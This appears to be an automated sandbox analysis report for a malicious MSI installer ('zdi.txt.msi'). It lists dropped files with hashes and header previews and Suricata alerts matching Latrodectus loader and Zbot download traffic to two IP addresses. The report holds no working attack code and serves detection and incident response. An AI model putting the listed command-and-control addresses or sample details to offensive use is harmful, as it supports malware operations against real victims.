Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI471C.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI473C.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI4808.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	401005
Entropy (8bit):	6.591684463339033
Encrypted:	false
SSDEEP:	6144:UMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1H:UMvZx0FlS68zBQSncb4ZPQTpAjZxqO1H
MD5:	D62B38F09088D567216C13D468C527E4
SHA1:	8D4CA36B45D1D1A315F4ACF4221A8AC35EF2537D
SHA-256:	A7E4784D376EF69C2F39889D10A79CB817D81A13B34C401B142BBD938164FE09
SHA-512:	31A6C1E346015340D9E64F5DDDFE435AB20D80D4C47DEE00054CCE4A34D4B4546397F84A055F53AEC8B7E04C10A4E2759BCA08EDB2C2C1933BDFF6CD96698494
Malicious:	false
Preview:	...@IXOS.@.....@.d.Y.@.....@.....@.....@.....@.....@......&.{998A301A-3216-4DC9-93E2-7045B0436D77}..TimeService..zdi.txt.msi.@.....@U....@.....@........&.{ECDEC887-FE4B-4D4C-AEE0-0B38AF17C8D1}.....@.....@.....@.....@.......@.....@.....@.......@......TimeService......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{B48CC27C-9823-4256-8235-834BFD2D0DBB};.C:\Users\user\AppData\Roaming\TimeService LLC\TimeService\.@.......@.....@.....@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}0.01:\Software\TimeService LLC\TimeService\Version.@.......@.....@.....@......&.{E10D9A62-ED71-41D8-87ED-0266356C1410}'.C:\Users\user\AppData\Roaming\wait.dll.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".;.C:\Users\user\AppData\Roaming\TimeService LLC\TimeService\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]...@.. ..@..

C:\Windows\Installer\MSI48D4.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	399328
Entropy (8bit):	6.589290025452677
Encrypted:	false
SSDEEP:	6144:gMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1:gMvZx0FlS68zBQSncb4ZPQTpAjZxqO1
MD5:	B9545ED17695A32FACE8C3408A6A3553
SHA1:	F6C31C9CD832AE2AEBCD88E7B2FA6803AE93FC83
SHA-256:	1E0E63B446EECF6C9781C7D1CAE1F46A3BB31654A70612F71F31538FB4F4729A
SHA-512:	F6D6DC40DCBA5FF091452D7CC257427DCB7CE2A21816B4FEC2EE249E63246B64667F5C4095220623533243103876433EF8C12C9B612C0E95FDFFFE41D1504E04
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................J......J..5.......................J......J......J..........Y..."......".q............."......Rich....................PE..L....<.a.........."......^...........2.......p....@..........................P......".....@.................................0....................................5...V..p....................X.......W..@............p.. ............................text....\.......^.................. ..`.rdata..XA...p...B...b..............@..@.data....6..........................@....rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Installer\SourceHash{998A301A-3216-4DC9-93E2-7045B0436D77}

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.1634539132169581
Encrypted:	false
SSDEEP:	12:JSbX72FjzoQAGiLIlHVRpY5h/7777777777777777777777777vDHFQNr1Hpdl0G:JWQQI5eqJsF
MD5:	2AEF57037079B519BDB463F4F20A0A54
SHA1:	B71DE2A22C64A816B4918043C2C01C4D2EC2C815
SHA-256:	71B44BB7145CB56268A7A6361B7FBD6A1A18DF0BA4CB90B4A652DFDF4B3934E2
SHA-512:	C9CD4916A2165E7EC739B6543D7058B3FE97557B3932916EB6A58607086633D7B9C218F874EB521884D68B1FF06EE7F5501E19B7BDB29235F54DD9029C612159
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.540176779234395
Encrypted:	false
SSDEEP:	48:d8Ph8uRc06WXJejT5g7OfgYSCfg6AECiCybto/fgYSCfgQTm+:Ah811jTIIcECr
MD5:	60CFA5C642879581FEEA5B6E4B0201E9
SHA1:	665E42FE194F4F46508E9596782E40E860526A22
SHA-256:	EEFD6CE12F8C1CFC26D6270707E384B4E90E891DAEEE2CC9327C75B109BE8F8F
SHA-512:	A4038919050D27D009EF34B051EEC7F22FB5F7EE24FAE77152BC8B1582A3957DB8EF408EBF6F3ADB04F4BD46DF23EED43B2749A19E86B123E315D713A2AD7909
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	432221
Entropy (8bit):	5.375184396953436
Encrypted:	false
SSDEEP:	1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauD:zTtbmkExhMJCIpErK
MD5:	6A27728FE32A1B4239330038435A13CF
SHA1:	CF83EC57B58301036B8AE0D5549CB3DCBA6441AB
SHA-256:	51734DCF74FC9D851FF7A74AF841EF0DC6B1F61CF6AEE34D7D5794B8E13CDDDC
SHA-512:	AC00443B0E13DD9D67BFD6551D5786285EC49163F95D25F09165820D7CEAAA6C9383B8EB31C78633A2F455D947A7C5525974508B975C7DDA060E9D88310F6599
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

C:\Windows\Temp\~DF0606AB9D6109E824.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF49E30092373E93C5.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF581C97A89ED8416F.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF5A96D35EDE356A10.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF5E32AC49DFA98868.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.07071102370850016
Encrypted:	false
SSDEEP:	6:2/9LG7iVCnLG7iVrKOzPLHKOGBNf0rk1Bk2tqVky6lf1:2F0i8n0itFzDHFQNr1BTd
MD5:	7140C98CD5829071A281A7D26D802F64
SHA1:	6637C21976B1F002BDCE98E8379676B81D6F90CE
SHA-256:	B4A809EBB4F5B8CDD8474445E883B662C78EA0CB87B9CD03760891D0DF7BE26D
SHA-512:	0E2BB34F9AC6AD78581F94E9A64FBECD893D965A4B69669B54002BD3E99E4948D234B8A3851B11ABE210EDA078B0C2A574DDDEF0FE9898FDA1E52E66BF28E2CE
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF8B911CC6E45EB733.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF9F39D725BAF3F65F.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2366660478198972
Encrypted:	false
SSDEEP:	48:Hx0uBI+CFXJ5T5I7OfgYSCfg6AECiCybto/fgYSCfgQTm+:R03RTAIcECr
MD5:	D443F68E90EA7F88F23014E1169CDB48
SHA1:	293BFA801706BDB8EB75DFBEBFB4CC42D98AD1C8
SHA-256:	77D7D88386127805C44C7B0402FB8DBD5349C97D74283FD5993D37CAB8F8E372
SHA-512:	AE4A01D06D8746265551B7EB392A3B468AE8D6C10C4BAFB794F97EB0EA89E0C7E2211DB224A6CC9C8E2A2E80DA25368C053D2058AFA1B4415FFA162EAFB798FC
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFC86A2EECEB586208.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.540176779234395
Encrypted:	false
SSDEEP:	48:d8Ph8uRc06WXJejT5g7OfgYSCfg6AECiCybto/fgYSCfgQTm+:Ah811jTIIcECr
MD5:	60CFA5C642879581FEEA5B6E4B0201E9
SHA1:	665E42FE194F4F46508E9596782E40E860526A22
SHA-256:	EEFD6CE12F8C1CFC26D6270707E384B4E90E891DAEEE2CC9327C75B109BE8F8F
SHA-512:	A4038919050D27D009EF34B051EEC7F22FB5F7EE24FAE77152BC8B1582A3957DB8EF408EBF6F3ADB04F4BD46DF23EED43B2749A19E86B123E315D713A2AD7909
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFC92AA70B3A2A17E6.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2366660478198972
Encrypted:	false
SSDEEP:	48:Hx0uBI+CFXJ5T5I7OfgYSCfg6AECiCybto/fgYSCfgQTm+:R03RTAIcECr
MD5:	D443F68E90EA7F88F23014E1169CDB48
SHA1:	293BFA801706BDB8EB75DFBEBFB4CC42D98AD1C8
SHA-256:	77D7D88386127805C44C7B0402FB8DBD5349C97D74283FD5993D37CAB8F8E372
SHA-512:	AE4A01D06D8746265551B7EB392A3B468AE8D6C10C4BAFB794F97EB0EA89E0C7E2211DB224A6CC9C8E2A2E80DA25368C053D2058AFA1B4415FFA162EAFB798FC
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFCEF614FEBAB0279B.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	0.12893775728506726
Encrypted:	false
SSDEEP:	48:iysTefgYSCfgNfgYSCfg6AECiCybtoA/:d+cEC2
MD5:	E156FC59D861D249D0F8CE0BF16CD585
SHA1:	5781F15958829D51FCCC798C4A4910215005D51B
SHA-256:	AF85778E1C7915D1E46F1AD2C06B213674D8F566A3351F82C03359DE0CACCD09
SHA-512:	6BF951238033522650AA737246F57E1B788EEF8757395394A7BFBBC0F766C727096281852BE7D12D3C007BB4D2911EAD2BC9AF205618F3DAF7881BBCF2D7610C
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFDF5BCCD847627237.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.540176779234395
Encrypted:	false
SSDEEP:	48:d8Ph8uRc06WXJejT5g7OfgYSCfg6AECiCybto/fgYSCfgQTm+:Ah811jTIIcECr
MD5:	60CFA5C642879581FEEA5B6E4B0201E9
SHA1:	665E42FE194F4F46508E9596782E40E860526A22
SHA-256:	EEFD6CE12F8C1CFC26D6270707E384B4E90E891DAEEE2CC9327C75B109BE8F8F
SHA-512:	A4038919050D27D009EF34B051EEC7F22FB5F7EE24FAE77152BC8B1582A3957DB8EF408EBF6F3ADB04F4BD46DF23EED43B2749A19E86B123E315D713A2AD7909
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFF12B76ECD009F834.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2366660478198972
Encrypted:	false
SSDEEP:	48:Hx0uBI+CFXJ5T5I7OfgYSCfg6AECiCybto/fgYSCfgQTm+:R03RTAIcECr
MD5:	D443F68E90EA7F88F23014E1169CDB48
SHA1:	293BFA801706BDB8EB75DFBEBFB4CC42D98AD1C8
SHA-256:	77D7D88386127805C44C7B0402FB8DBD5349C97D74283FD5993D37CAB8F8E372
SHA-512:	AE4A01D06D8746265551B7EB392A3B468AE8D6C10C4BAFB794F97EB0EA89E0C7E2211DB224A6CC9C8E2A2E80DA25368C053D2058AFA1B4415FFA162EAFB798FC
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {ECDEC887-FE4B-4D4C-AEE0-0B38AF17C8D1}, Number of Words: 10, Subject: TimeService, Author: TimeService LLC, Name of Creating Application: TimeService, Template: ;1033, Comments: Runtime service TimeService., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Entropy (8bit):	7.48425232853397
TrID:	Windows SDK Setup Transform Script (63028/2) 47.91% Microsoft Windows Installer (60509/1) 46.00% Generic OLE2 / Multistream Compound File (8008/1) 6.09%
File name:	zdi.txt.msi
File size:	2'254'336 bytes
MD5:	71f04fe0afc51fee5e68e33431a7fb51
SHA1:	81952c2d3bb3558ec36900877080dbae0dc6a8bb
SHA256:	61365e29247428b26c8a6ca0d6326bbd04c2c798d7abad1660338ce3c11c68c4
SHA512:	1852553740eeee5bff381c26d3edaa1cf3a4d6780a9775a99f678e507c9c51af2370c8de97a3faeacc032665de3359e3f32f9af70b0612ea1e663b7bde68be73
SSDEEP:	49152:Tw13YQW8zBQSc0ZnSKBZKumZr7ADAH8THY8PA4pWj+9f:MYH0Zn3K/AgSxpWK
TLSH:	2DA5F1223386C537D96E01702A1AD6AB557DFDB30B3140D7A3C82D2EAD744C1A63AF97
File Content Preview:	........................>...................#...................................E.......a...............................(...)...*...+...,...-...........A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P..........................................

File Icon


Icon Hash:	2d2e3797b32b2b99

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-02T18:40:59.589693+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49865	104.21.16.251	443	TCP
2024-12-02T18:40:59.643959+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49865	104.21.16.251	443	TCP
2024-12-02T18:41:02.966560+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49873	104.21.16.251	443	TCP
2024-12-02T18:41:03.696638+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49873	104.21.16.251	443	TCP
2024-12-02T18:41:05.046080+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49879	104.21.16.251	443	TCP
2024-12-02T18:41:05.812203+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49879	104.21.16.251	443	TCP
2024-12-02T18:41:07.769254+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49885	104.21.16.251	443	TCP
2024-12-02T18:41:08.550860+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49885	104.21.16.251	443	TCP
2024-12-02T18:41:09.886491+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49891	104.21.16.251	443	TCP
2024-12-02T18:41:12.455437+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49891	104.21.16.251	443	TCP
2024-12-02T18:41:12.455437+0100	2018052	ET MALWARE Zbot Generic URI/Header Struct .bin	1	192.168.2.4	49891	104.21.16.251	443	TCP
2024-12-02T18:41:15.460308+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49904	104.21.16.251	443	TCP
2024-12-02T18:41:17.893017+0100	2018052	ET MALWARE Zbot Generic URI/Header Struct .bin	1	192.168.2.4	49904	104.21.16.251	443	TCP
2024-12-02T18:41:19.294816+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49914	104.21.16.251	443	TCP
2024-12-02T18:41:21.232686+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49914	104.21.16.251	443	TCP
2024-12-02T18:41:21.232686+0100	2018052	ET MALWARE Zbot Generic URI/Header Struct .bin	1	192.168.2.4	49914	104.21.16.251	443	TCP
2024-12-02T18:41:25.971166+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49929	104.21.16.251	443	TCP
2024-12-02T18:41:25.972011+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49929	104.21.16.251	443	TCP
2024-12-02T18:41:28.050993+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49934	104.21.16.251	443	TCP
2024-12-02T18:41:28.838413+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49934	104.21.16.251	443	TCP
2024-12-02T18:41:30.336857+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49940	104.21.16.251	443	TCP
2024-12-02T18:41:31.154781+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49940	104.21.16.251	443	TCP
2024-12-02T18:41:32.576157+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49946	104.21.16.251	443	TCP
2024-12-02T18:41:33.284111+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49946	104.21.16.251	443	TCP
2024-12-02T18:41:34.956798+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49953	104.21.16.251	443	TCP
2024-12-02T18:41:35.701587+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49953	104.21.16.251	443	TCP
2024-12-02T18:41:37.058991+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49956	104.21.16.251	443	TCP
2024-12-02T18:41:37.059956+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49956	104.21.16.251	443	TCP
2024-12-02T18:41:39.300163+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49962	104.21.16.251	443	TCP
2024-12-02T18:41:39.585644+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49962	104.21.16.251	443	TCP
2024-12-02T18:41:41.150831+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49967	104.21.68.89	443	TCP
2024-12-02T18:41:42.730972+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49967	104.21.68.89	443	TCP
2024-12-02T18:41:44.143135+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49974	104.21.68.89	443	TCP
2024-12-02T18:41:45.759525+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49974	104.21.68.89	443	TCP
2024-12-02T18:41:47.125173+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49982	104.21.68.89	443	TCP
2024-12-02T18:41:48.715580+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49982	104.21.68.89	443	TCP
2024-12-02T18:41:50.110280+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49988	104.21.68.89	443	TCP
2024-12-02T18:41:51.735785+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49988	104.21.68.89	443	TCP
2024-12-02T18:41:53.449931+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49997	104.21.68.89	443	TCP
2024-12-02T18:41:55.211081+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49997	104.21.68.89	443	TCP
2024-12-02T18:41:56.555095+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50005	104.21.68.89	443	TCP
2024-12-02T18:41:58.162801+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50005	104.21.68.89	443	TCP
2024-12-02T18:41:59.485709+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50013	104.21.68.89	443	TCP
2024-12-02T18:42:01.088823+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50013	104.21.68.89	443	TCP
2024-12-02T18:42:02.448685+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50020	104.21.68.89	443	TCP
2024-12-02T18:42:04.060875+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50020	104.21.68.89	443	TCP
